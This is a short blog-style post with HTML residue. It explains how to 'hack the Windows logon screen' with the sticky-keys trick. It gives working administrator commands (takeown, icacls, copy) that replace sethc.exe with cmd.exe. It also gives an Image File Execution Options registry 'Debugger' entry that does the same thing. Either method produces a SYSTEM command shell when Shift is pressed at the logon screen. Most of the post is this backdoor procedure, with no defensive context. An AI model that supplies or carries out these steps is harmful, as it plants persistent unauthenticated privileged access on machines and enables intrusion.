How many times have you seen a movie where the “hacker” connects to a system with a logon screen, hits a couple of keys, and gets a command shell. Here’s how this can be done for real in Windows.<\/p>\n
The issue is that the Windows Ease of Use tools are accessible at the logon screen. Replacing the valid command(s) with a copy of cmd.exe provides a hidden command shell when pressing the right key combo (for example, pressing shift over and over again for “sticky keys”).<\/p>\n
Here’s how to “hack the Windows logon screen” using an existing logged in privileged account.<\/p>\n
Open a command prompt in Windows as an administrator and run the following commands:<\/p>\n
cd\\
\ncd windows\\system32<\/p>\nicacls c:\\windows\\system32\\sethc.exe \/save c:\\windows\\system32\\sethc.ACLFile \/T
\ntakeown \/f sethc.exe
\nicacls sethc.exe \/grant administrators:f<\/p>\nicacls c:\\windows\\system32\\cmd.exe \/save c:\\windows\\system32\\cmd.ACLFile \/T
\ntakeown \/f cmd.exe
\nicacls cmd.exe \/grant administrators:f<\/p>\ncopy c:\\windows\\system32\\sethc.exe c:\\windows\\system32\\sethcexe.BAK
\ncopy c:\\windows\\system32\\cmd.exe c:\\windows\\system32\\sethc.exe<\/p><\/blockquote>\nNote that this can also be set via a registry enttry:<\/p>\n
Open Regedit and browse to:\u00a0 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options
\nCreate a new key called “sethc.exe”
\nUnder this new key, create a new string value (REG_SZ) and call it “Debugger”
\nModify this value to be “C:\\windows\\system32\\cmd.exe”<\/p>\nNote that the winlogon process will kill the cmd window invoked through this method after a short amount of time.<\/em><\/p><\/blockquote>\n
You can now open the command prompt by pressing the Shift key about 5 to 10 times at the logon screen to open command prompt as SYSTEM.<\/p>\n
\n\t\t